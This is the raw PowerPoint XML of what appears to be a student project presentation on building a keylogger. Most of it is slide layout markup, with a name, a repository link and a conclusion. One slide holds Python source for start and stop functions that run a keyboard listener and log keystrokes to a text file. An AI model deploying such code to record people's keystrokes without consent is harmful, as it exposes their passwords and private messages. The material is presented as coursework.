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60" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId2"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>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78" d="100"/>
          <a:sy n="78" d="100"/>
        </p:scale>
        <p:origin x="850"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7" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104868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8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86" name=""/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr altLang="en-US" lang="zh-CN"/>
              <a:t> </a:t>
            </a:r>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45" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="702156"/>
            <a:ext cx="11029616" cy="1013800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048646"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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{2CED4963-E985-44C4-B8C4-FDD613B7C2F8}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/4/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048648" name="Footer Placeholder 4"/>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9" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048630"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1"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2"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3"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4"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5"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6" name="Date Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{ED291B17-9318-49DB-B28B-6E5994AE9581}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/4/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048637"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8"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2" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048650"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1"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2"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3" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{B2497495-0637-405E-AE64-5CC7506D51F5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/4/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048654" name="Footer Placeholder 8"/>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3" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048656" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="492855"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048657"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Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{7BFFD690-9426-415D-8B65-26881E07B2D4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/4/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048660" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104866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4" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048662" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="988332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048663"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4"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6"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Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{04C4989A-474C-40DE-95B9-011C28B71673}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/4/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048668" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104866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25" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575894" y="729658"/>
            <a:ext cx="11029616" cy="592246"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048626" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{5DB4ED54-5B5E-4A04-93D3-5772E3CE3818}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/4/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048627" name="Footer Placeholder 3"/>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5" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048670" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{4EDE50D6-574B-40AF-946F-D52A04ADE379}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/4/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048671" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104867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73"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4"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7" name="Date Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7605951" y="6456916"/>
            <a:ext cx="2844799" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{D82884F1-FFEA-405F-9602-3DCA865EDA4E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/4/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048678" name="Footer Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6452590"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048679"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39"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0"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1"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2" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{7E18DB4A-8810-4A10-AD5C-D5E2C667F5B3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/4/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048643"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hyperlink" Target="https://github.com/techtrainer20/TNSDC" TargetMode="Externa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keyloggers</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707886"/>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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SURRYA</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>GANESH</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Dmi</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> College of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-IN">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Engineering-IT</a:t>
            </a:r>
            <a:endParaRPr b="1"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4"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5"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6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(state='normal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(text="Keylogger stopped.")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>start_button</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7"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pic>
        <p:nvPicPr>
          <p:cNvPr id="2097155" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384726" y="1719024"/>
            <a:ext cx="2991267" cy="3419952"/>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8"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pic>
        <p:nvPicPr>
          <p:cNvPr id="2097156" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="904352" y="1692540"/>
            <a:ext cx="7487695" cy="752580"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097157" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="720801" y="3458124"/>
            <a:ext cx="11250407" cy="1563408"/>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9" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048620" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901232" y="0"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="0" dirty="0" sz="2000" i="0" lang="en-US">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dirty="0" sz="200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1" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr b="1" dirty="0" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Improved user interface: The program can be enhanced to provide a more user-friendly interface, making it easier for users to navigate and use the program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:endParaRPr dirty="0" lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048622"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3"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24" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr dirty="0" sz="2400" lang="en-IN"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2400" lang="en-IN">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://github.com/techtrainer20/TNSDC</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="2400" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr dirty="0" sz="2400" lang="en-IN"/>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9"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58649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 </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r>
              <a:rPr dirty="0" sz="2000" lang="en-US">
